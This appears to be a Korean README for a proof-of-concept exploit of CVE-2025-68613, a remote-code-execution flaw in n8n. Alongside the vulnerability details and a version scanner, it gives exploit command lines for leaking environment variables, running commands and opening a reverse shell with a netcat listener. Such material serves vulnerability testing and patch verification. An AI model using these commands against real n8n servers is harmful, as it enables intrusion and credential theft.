
CVE-2025-68613

심각도: 🔴 치명적 영향: 원격 코드 실행 영향받는 플랫폼: n8n (워크플로 자동화)
CVE-2025-68613은 n8n(오픈소스 워크플로 자동화 플랫폼)의 심각한 보안 취약점입니다. 이 문제는 인증된 공격자가 워크플로 표현식이 평가되는 방식을 악용하여 서버에서 임의 코드를 실행할 수 있게 합니다.
💥 위험한 이유: 악성 표현식이 제대로 샌드박싱되지 않은 컨텍스트에서 평가되어 기본 런타임에 접근할 수 있습니다.

악용에 성공하면 공격자는 다음을 수행할 수 있습니다:
공격은 n8n 서비스와 동일한 권한으로 실행되어 그 영향을 증폭시킵니다.
| 지표 | 값 |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| 기밀성 | 높음 |
| 무결성 | 높음 |
| 가용성 | 높음 |
➡️ 인증이 필요하지만 관리자 권한은 필요하지 않습니다.
🚫 취약한 버전:
0.211.0 → 1.120.31.121.0✅ 패치된 버전:
1.120.41.121.11.122.0 이상(취약점을 완전히 제거하지는 않음)
CVE-2025-68613.py — 원격 버전 및 노출 여부 확인 도구 (안전)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
또는 호스트 목록을 스캔하려면 다음을 실행하세요:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
출력 예
사용 예:
환경 변수 유출:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
사용자 정보 확인:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
리버스 셸 (먼저 리스너를 실행: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
이 스크립트는 귀하가 소유하거나 명시적 테스트 허가를 받은 시스템에서만 공인된 보안 테스트 용도로 사용하세요.
🔒 이 스크립트는 n8n의 CVE-2025-68613에 대한 개념 증명(PoC) 익스플로잇입니다.
📚 본 스크립트는 교육 목적으로만 제공되며 공인된 보안 테스트 전용입니다.
🛡️ 소유, 관리 중이거나 명시적 서면 허가를 받은 시스템에서만 전용으로 사용하십시오.
🚫 승인되지 않은 시스템에 대한 무단 사용은 불법이며 법률(예: 컴퓨터 사기 및 남용 관련 법률)을 위반할 수 있습니다.
❌ 작성자 및 관련 당사자는 오용, 손상 또는 법적 결과에 대해 어떠한 책임도 지지 않습니다.
✅ 책임감 있게, 윤리적으로, 그리고 적용 가능한 모든 법률과 규정을 완전히 준수하여 사용하십시오.
🔐 침투 테스트를 수행하는 경우 적절한 승인(예: 참여 규칙(Rules of Engagement))이 마련되어 있는지 확인하십시오.
🛠️ 보안 연구원은 이 스크립트를 사용하여 취약점을 검증하고 신속한 패치를 장려할 수 있습니다.
| 범주 | 정보 |
|---|
| CVE ID | CVE-2025-68613 |
| 제품 | n8n |
| 버그 유형 | 표현식 주입 |
| 결과 | 원격 코드 실행 |
| 필요 접근 권한 | 인증된 사용자 |
| 수정 가능 여부 | 예 |